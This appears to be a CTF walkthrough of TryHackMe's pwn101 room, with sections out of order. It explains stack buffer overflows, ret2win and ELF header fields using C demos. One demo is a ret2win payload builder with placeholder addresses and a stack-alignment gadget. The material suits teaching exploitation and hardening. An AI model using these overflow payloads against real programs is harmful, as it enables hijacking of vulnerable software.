Tryhackme

pwn102

102 Introduction For the next challenge we are required to modify a variable's value by overflowing a buffer. A buffer overflow occurs when more data is written into an allocated region of memory (the buffer) than it can hold; the excess spills into adjacent memory, including other variables. But if the stack grows downwards and the return address sits above the local variables, shouldn't the overflow write into the memory below rather than above? No. The stack grows downwards only in the sense that each function called later gets its frame at a lower address; a write into a buffer (gets, strcpy, read) still proceeds from low addresses to high. The return address was pushed before the callee allocated its locals, so it sits at a higher address than the buffer, as does the saved rbp and, depending on how the compiler laid out the frame, the other locals. Overflowing the buffer therefore marches upward into exactly those slots.
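To make the layout concrete, here is an added example (my own, not the challenge binary): a 16-byte buffer with a 4-byte variable placed right after it, a copy that trusts the caller's length, and the payload that rewrites the variable. A struct fixes the two slots next to each other so the result is deterministic; in a real stack frame the compiler chooses the order and padding, so the distance is found with a debugger or a cyclic pattern. The 16-byte buffer size and the 0xdeadbeef value are assumptions for the demo.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the room's binary. The struct stands in for a stack
 * frame: 16 bytes of buffer immediately followed by the 4-byte variable we
 * want to change. Hypothetical layout; a real frame is laid out by the
 * compiler. */
struct frame {
    char buf[16];
    uint32_t target;
};

#define TARGET_INITIAL 0x11111111u

/* Vulnerable copy: the missing check is against sizeof f.buf, so bytes
 * beyond the buffer land in target. The copy runs toward higher addresses,
 * which is why the variable placed after the buffer is the one clobbered.
 * (Length is clamped to the whole frame only to keep the demo well-defined.) */
static uint32_t copy_unchecked(const uint8_t *input, size_t len) {
    struct frame f;
    memset(&f, 0, sizeof f);
    f.target = TARGET_INITIAL;
    if (len > sizeof f)
        len = sizeof f;
    memcpy(&f, input, len);
    return f.target;
}

/* Hardened copy: refuses anything that does not fit in buf.
 * Returns -1 on rejection, otherwise the (unchanged) value of target. */
static int64_t copy_checked(const uint8_t *input, size_t len) {
    struct frame f;
    memset(&f, 0, sizeof f);
    f.target = TARGET_INITIAL;
    if (len > sizeof f.buf)
        return -1;
    memcpy(f.buf, input, len);
    return f.target;
}

/* Classic payload: fill the buffer, then append the new value in
 * little-endian byte order (the binaries in these rooms are LSB executables). */
static size_t build_payload(uint8_t *out, uint32_t value) {
    memset(out, 'A', 16);
    for (int i = 0; i < 4; i++)
        out[16 + i] = (uint8_t)(value >> (8 * i));
    return 20;
}

/* Value of target after the overflow (expected: `value`). */
uint32_t demo_overflow(uint32_t value) {
    uint8_t payload[20];
    size_t n = build_payload(payload, value);
    return copy_unchecked(payload, n);
}

/* Exactly 16 bytes fit in the buffer, so target keeps its initial value. */
uint32_t demo_exact_fit(void) {
    uint8_t payload[16];
    memset(payload, 'A', sizeof payload);
    return copy_unchecked(payload, sizeof payload);
}

/* Same 20-byte payload through the bounded copy: -1 means it was rejected. */
int64_t demo_checked(uint32_t value) {
    uint8_t payload[20];
    size_t n = build_payload(payload, value);
    return copy_checked(payload, n);
}

int main(void) {
    printf("target before:        0x%08x\n", demo_exact_fit());
    printf("target after overflow: 0x%08x\n", demo_overflow(0xdeadbeefu));
    printf("bounded copy result:   %lld\n", (long long)demo_checked(0xdeadbeefu));
    return 0;
}
```

The bytes after the padding come out as 0xdeadbeef only because the host reads target least-significant byte first; on a big-endian target the same four bytes would be written in the opposite order.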

pwn103

103 Introduction Here we are met by a ret2win challenge: the binary contains a function that is never reached in normal execution but does something useful for us, such as spawning a shell or, in a CTF, printing the flag, and our job is to redirect execution into it by overwriting the saved return address. We can start with some simple binary analysis, for example checking the binary protections using checksec. Let us break the output down bit by bit.

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

Arch: amd64-64-little This line specifies the architecture of the binary.
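An added example, not the room's solve script, of how the ret2win payload is laid out once the offset and the address of the win function are known. The offset (40), win address (0x401196) and ret gadget address (0x40101a) are placeholders I chose for the demo; on the real binary the offset comes from a cyclic pattern under a debugger and the addresses from nm or objdump, which is only possible to hard-code because there is no PIE. With no canary there is nothing between the buffer and the saved return address that needs leaking first. The optional ret gadget keeps the stack 16-byte aligned when win() is entered, which avoids a movaps crash inside glibc's printf or system on x86-64.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example. All three values are hypothetical placeholders. */
#define OFFSET_TO_RIP 40            /* bytes from buffer start to saved rip */
#define WIN_ADDR      0x401196ULL   /* address of the win function */
#define RET_GADGET    0x40101aULL   /* address of a lone `ret` instruction */

/* Write a 64-bit value as 8 little-endian bytes (what pwntools' p64 does). */
static void put_u64_le(uint8_t *out, uint64_t v) {
    for (int i = 0; i < 8; i++)
        out[i] = (uint8_t)(v >> (8 * i));
}

/* Read it back (pwntools' u64), used to check what the payload says. */
uint64_t get_u64_le(const uint8_t *in) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | in[i];
    return v;
}

/* Lay out the ret2win payload:
 *   [ padding up to saved rip ][ ret gadget (optional) ][ win address ]
 * The padding covers the buffer, any other locals and the saved rbp, since
 * all of those sit below the return address. When the vulnerable function
 * executes `ret`, rsp points at our first 8-byte word, so that is where
 * execution goes; a `ret` gadget there pops the next word (win) and leaves
 * rsp 16-byte aligned on entry to win(). Pass ret_gadget = 0 to omit it.
 * Returns the payload length; out must hold at least offset + 16 bytes. */
size_t build_ret2win(uint8_t *out, size_t offset, uint64_t win, uint64_t ret_gadget) {
    size_t n = 0;
    memset(out, 'A', offset);
    n += offset;
    if (ret_gadget) {
        put_u64_le(out + n, ret_gadget);
        n += 8;
    }
    put_u64_le(out + n, win);
    n += 8;
    return n;
}

/* Shared buffer so the helpers below can be called without setup. */
static uint8_t g_payload[OFFSET_TO_RIP + 16];

/* Build the payload with or without the alignment gadget; returns its length. */
size_t demo_build(int with_gadget) {
    return build_ret2win(g_payload, OFFSET_TO_RIP, WIN_ADDR,
                         with_gadget ? RET_GADGET : 0);
}

/* The 8-byte word at `off` in the last built payload (0 if out of range). */
uint64_t demo_word_at(size_t off) {
    if (off + 8 > sizeof g_payload)
        return 0;
    return get_u64_le(g_payload + off);
}

int main(void) {
    size_t n = demo_build(1);
    /* In a real run these bytes go to the process's stdin, e.g. written to a
     * file and fed with ./pwn103 < payload, or sent with pwntools. */
    printf("payload length %zu\n", n);
    printf("first return target 0x%llx\n",
           (unsigned long long)demo_word_at(OFFSET_TO_RIP));
    printf("then 0x%llx\n",
           (unsigned long long)demo_word_at(OFFSET_TO_RIP + 8));
    return 0;
}
```

If the win function works in a debugger but segfaults when run normally, the alignment caveat above is the first thing to check: the extra `ret` costs nothing and removes the most common ret2win failure on modern glibc.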

pwn104

104 Introduction First of all we are going to do some file checks, to see the binary protections and determine the file type of pwn104:

    pwn104: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=60e0bab59b4e5412a1527ae562f5b8e58928a7cb, for GNU/Linux 3.2.0, not stripped

So the binary is a 64-bit LSB (least significant byte first, in other words little-endian) ELF executable for x86-64. It is dynamically linked, so libc is loaded at run time through the interpreter /lib64/ld-linux-x86-64.so.2 rather than compiled in, and it is not stripped, so function and variable names survive in the symbol table and will show up in a disassembler or debugger.
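Everything file printed here is read from the first bytes of the ELF header, so as an added example (mine, not from the room) here is a small parser that recovers the class (32/64-bit), data encoding (LSB/MSB), object type and machine from a header. It comes with two constructed headers: one ET_EXEC, the shape pwn104 has and the reason checksec reports "No PIE", and one ET_DYN, which is what a PIE executable carries. The sample bytes are constructed for the demo, not taken from pwn104; the constants are from the ELF specification.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* ELF constants (from the ELF specification; defined here so the example
 * does not depend on <elf.h>). */
#define EI_CLASS    4
#define EI_DATA     5
#define EI_OSABI    7
#define ELFCLASS32  1
#define ELFCLASS64  2
#define ELFDATA2LSB 1
#define ELFDATA2MSB 2
#define ET_EXEC     2   /* fixed load address: "No PIE" */
#define ET_DYN      3   /* position independent: PIE or shared object */
#define EM_X86_64   62

struct elf_summary {
    int valid;          /* magic present and header long enough */
    int bits;           /* 32 or 64 */
    int little_endian;  /* 1 for LSB, 0 for MSB */
    uint8_t osabi;      /* 0 is System V, which file prints as (SYSV) */
    uint16_t e_type;
    uint16_t e_machine;
};

/* Read a 16-bit field honouring the byte order declared in e_ident[EI_DATA]. */
static uint16_t rd16(const uint8_t *p, int little) {
    return little ? (uint16_t)(p[0] | (p[1] << 8))
                  : (uint16_t)((p[0] << 8) | p[1]);
}

/* Decode the fields file reports. Only the first 20 bytes are needed:
 * 16 bytes of e_ident, then e_type and e_machine. */
struct elf_summary parse_elf_header(const uint8_t *hdr, size_t len) {
    struct elf_summary s;
    memset(&s, 0, sizeof s);
    if (len < 20 || memcmp(hdr, "\x7f" "ELF", 4) != 0)
        return s;                           /* valid stays 0 */
    s.valid = 1;
    s.bits = hdr[EI_CLASS] == ELFCLASS64 ? 64
           : hdr[EI_CLASS] == ELFCLASS32 ? 32 : 0;
    s.little_endian = hdr[EI_DATA] == ELFDATA2LSB;
    s.osabi = hdr[EI_OSABI];
    s.e_type = rd16(hdr + 16, s.little_endian);
    s.e_machine = rd16(hdr + 18, s.little_endian);
    return s;
}

/* 1 if the executable is position independent (ET_DYN), 0 if it has a fixed
 * load address (ET_EXEC), -1 if the bytes are not an ELF header at all. */
int elf_is_pie(const uint8_t *hdr, size_t len) {
    struct elf_summary s = parse_elf_header(hdr, len);
    if (!s.valid)
        return -1;
    return s.e_type == ET_DYN;
}

/* Constructed 64-byte header of a 64-bit little-endian x86-64 ET_EXEC.
 * Only the bytes the parser looks at are filled in; the rest are zero. */
static const uint8_t sample_no_pie[64] = {
    0x7f, 'E', 'L', 'F', ELFCLASS64, ELFDATA2LSB, 1, 0,  /* e_ident[0..7] */
    0, 0, 0, 0, 0, 0, 0, 0,                              /* padding */
    ET_EXEC, 0,                                          /* e_type, LSB */
    EM_X86_64, 0,                                        /* e_machine = 62 */
};

/* Same header with e_type = ET_DYN, as a PIE executable would carry. */
static const uint8_t sample_pie[64] = {
    0x7f, 'E', 'L', 'F', ELFCLASS64, ELFDATA2LSB, 1, 0,
    0, 0, 0, 0, 0, 0, 0, 0,
    ET_DYN, 0,
    EM_X86_64, 0,
};

int main(void) {
    struct elf_summary s = parse_elf_header(sample_no_pie, sizeof sample_no_pie);
    printf("ELF %d-bit %s, machine %u, e_type %u, pie=%d\n",
           s.bits, s.little_endian ? "LSB" : "MSB", s.e_machine, s.e_type,
           elf_is_pie(sample_no_pie, sizeof sample_no_pie));
    printf("pie sample: pie=%d\n", elf_is_pie(sample_pie, sizeof sample_pie));
    return 0;
}
```

Whether a binary is dynamically linked or stripped is not in the ELF header itself: file finds the interpreter in the PT_INTERP program header and the symbol names in a .symtab section, so on a stripped binary the parser above still works while the function names a debugger would show are gone.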

pwn101

Hello guys and welcome to my walkthrough along this journey of binary exploitation. In this writeup we shall be handling the pwn101 room on TryHackMe. Before jumping into this room, there are some prerequisites for completing the challenges:

1. C programming language
2. Assembly language (basics)
3. Some experience in reverse engineering, using debuggers, and understanding low-level concepts
4. Python scripting and pwntools
5. A lot of patience

Let's learn. 101 Introduction We begin with an easy task. I reckon it is going to be a buffer overflow; I will explain this in the analysis part.